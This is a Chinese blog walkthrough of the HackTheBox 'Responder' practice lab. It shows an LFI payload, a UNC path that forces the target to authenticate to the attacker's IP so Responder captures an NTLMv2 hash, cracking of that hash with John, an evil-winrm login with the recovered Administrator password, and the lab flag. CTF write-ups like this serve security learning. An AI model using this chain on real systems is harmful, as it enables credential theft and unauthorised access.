首页 > 其他分享 >HackTheBox(黑客盒子)基础模块速通Responder篇

HackTheBox(黑客盒子)基础模块速通Responder篇

时间:2024-06-08 17:31:01浏览次数:21  
标签:responder 速通 .. Responder flag HackTheBox 任务 靶机 john

前言

    还是速通,直接给大家上解题思路。这台靶机侧重使用responder工具通过黑化kali获取hash。

靶机提供

准备

目标靶机

网络连通

题目已披露的漏洞环境

实战攻击

任务一

unika.htb

任务二

直接上nmap扫服务,试试看能否爆出来。

nmap -sV -T4 10.129.253.226 

可以看到这里能爆出来。

也可以使用burp suite抓包来获取

php

      尝试修改hosts文件禁止这种跳转,以kali为例,首先编辑/etc/hosts文件,添加一下IP地址和跳转的地址。

vim /etc/hosts

这样再次访问就有页面出来了。

任务三

在页面中随机翻找,找到交互按钮。

点开后有个灰色的交互按钮,双击后就跳转到了这个站点。

http://unika.htb/index.php?page=german.html

       观察页面的前端属性,发现没有变化,站点后缀变为了.html,所以将重点转移到站点路径上,盲猜单词page可以切换语言版本,直接提交,通过。

page

任务四

这一题是选择题,笨方法是直接一个个接着提交就能过。

第三个选项更符合本地文件包含漏洞的构造特征

../../../../../../../../windows/system32/drivers/etc/hosts

任务五

还是选择题,数值为somefile

//10.10.14.6/somefile

任务六

度娘:New Technology LAN Manager

New Technology LAN Manager

任务七

           responder 这个工具会回答发出的LLMNR和NBT-NS查询,诱使受害者主机提供Net-NTLM哈希。该工具一般只针对SMB的文件服务器服务请求。kali系统中内置。

responder --help

查询一下应用参数

-I 

任务八

度娘:john the ripper 可以用来破解NTLM的哈希。

john the ripper

任务九

使用responder工具进行获取NTLMv2哈希。

responder常用参数

-I 设置监听的网络接口,eth0
-f 收集NBT_NS或LLMNR的信息
-w 设置WPAD服务器

使用responder监听本地tun0网卡

Rsponder - I tun0
#tun0网卡为openvpn的虚拟网卡

然后靶机的地址访问本地的地址,注意访问的是本地的地址,就是openvpn获取到的地址

抓取到哈希

放入john破解

john responder

或者将hash值复制出来,写入txt文档,再丢入john破解。

john破解hash的过程有点久................

取决于你的kali虚拟机的性能。

cpu都跑满了。

经过漫长的等待,也是跑出来了

管理员用户的密码:badminton

badminton 

任务十

度娘:5985

5985

任务十一

      自由题来了,先整合前面获取到的所有信息,该服务器存在本地文件包含漏洞,信息泄露,密码抓取,获取到了管理员用户名和密码。

      使用nmap对靶机进行一次重扫,查看运行的服务。

nmap -sV -p- 10.129.253.226

结合上题的远程访问responder计算机的侦听端口。直接使用红队神器evil-winrm进行连接测试。

具体使用方法:>>>红队神器evil-winrm的使用<<<

evil-winrm -i 10.129.253.226 -u Administrator -p badminton

成功连接。

使用cd命令回到根目录。

分析系统中的用户。

net user

发现一个名为mike的用户比较可疑,逐级进入查看。

开始查看目录下的文件和下级目录,在mike账户下的desktop目录下发现名为flag.txt的文件。

查看flag.txt文件,拿到flag值。

cat flag.txt

flag={ea81b7afddd03efaa0945333ed147fac}

靶机通关-试验结束

标签:responder,速通,..,Responder,flag,HackTheBox,任务,靶机,john
From: https://blog.csdn.net/qq_73252299/article/details/139546765

相关文章

  • 【Microelectronic Systems】期末速通
    PART1嵌入式系统概述与玩转mbed1嵌入式系统,微控制器,与ARM1.1什么是嵌入式系统?微处理器不仅仅存在于通用计算机中,也可以安置在一些不需要计算的设备内部,比如洗衣机,摄像机。微处理器常常可以控制这些产品。因为这类产品的微处理器镶嵌在内部,所以称这类产品为嵌入式系统。......
  • 【大学物理实验】速通双语版
    0首先,我们要学什么?outlook!1measurement2systemerror&randomerror3significantfigures4uncertaintyofdirectmeasurementandindirectmeasurement5dataprocessing1measurementImportantpointstoremember:1.Ameasurementwithoutunitismeaningless.2......
  • DP读书:《半导体物理学(第八版)》(七) 金属与半导体的接触- 10 min 速通(载流子分布)
    《半导体物理学(第八版)》10min速通金属与半导体的接触7.1金属与半导体的接触及其能带图7.1.1金属和半导体的功函数7.1.2接触电势差7.1.3表面态对接触势垒的影响7.2金属半导体接触整流理论7.2.1扩散理论7.2.2热电子发射理论7.2.3镜像力和隧道效应的影响7.2.4......
  • AI降重工具笔灵AI:如何帮助学生快速通过论文查重?
    论文降重一直是困扰各界毕业生的“拦路虎”,还不容易熬过修改的苦,又要迎来降重的痛。其实想要给论文降重达标,我有一些独家秘诀。话不多说直接上干货!1、同义词改写(针对整段整句重复)这是最靠谱也是比较费精力的办法,就是在保证同义的情况下改写内容,幅度要大。往往需要整段改写,一......
  • 【IC验证】一文速通多通道数据整型器(MCDF)
    目录01README02MCDF设计结构2.1功能描述2.2设计结构2.3接口与时序2.3.1系统信号接口2.3.2通道从端接口2.3.3整形器接口2.3.4控制寄存器接口2.3.4.1接口时序图2.3.4.2各数据位信息03验证框图3.1reg_pkg3.1.1reg_trans3.1.2reg_driver3.1.3reg_......
  • 基础元素化学速通指北-氧族元素
    前言氧的第二电子亲合能是正值。/jy正文物理性质这一族竟然结合第二个电子要吸收能量。/cf/cf所以形成\(\ce{X^{2-}}\)的倾向比卤素\(\ce{X^-}\)的倾向小得多。但是氧比较有实力,能和多数金属形成离子型化合物,形成离子晶体的晶格能足以补偿结合第二个电子所需的能量。除......
  • 速通期末之计算机网络——1.计网概述
    计算机网络概述定义:将地理位置不同的独立的计算机,通过通信线路连接,实现资源共享组成:资源子网(提供资源)&&通信子网(提供网络节点和线路)类型:拓扑:星型,树形,总线型,环型,网状范围:局域网(LAN),城域网(MAN),广域网(WAN)传输方式:有线网络,无线网络体系结构:传输方式按传输方向:单工(只能单方向......
  • 莫比乌斯反演即狄利克雷卷积速通
    莫比乌斯反演速通前言由于请假错过了讲课,所以莫反是我第一个需要自学的难度不小的数学知识。自学的过程的狼狈的,旁边也曾是自学的czn告诉我如果学会“狄利克雷卷积”就可以对“莫比乌斯反演”的理解进行“降维打击”。他还十分热心地带着我速通了一遍狄卷与莫反。一知半解,就......
  • 一句话速通银行家算法
    一句话速通银行家算法:try分配资源,ifsafe()thencontinue;                     else归还资源并且sleep(当前任务).好,本文结束。hh其实并没有,接下来我将解释这句话以及银行家算法究竟是个啥。 ps:银行家算法是tryassign(), 而还有个锁的ap......
  • VUE速通(10)Vue3核心语法(2)setup
    1setup概述setup是Vue3中一个新的配置项,值是一个函数,它是CompositionAPI“表演的舞台”,组件中所用到的:数据、方法、计算属性、监视......等等,均配置在setup中。特点如下:setup函数返回的对象中的内容,可直接在模板中使用。setup中访问this是undefined。setup函数会......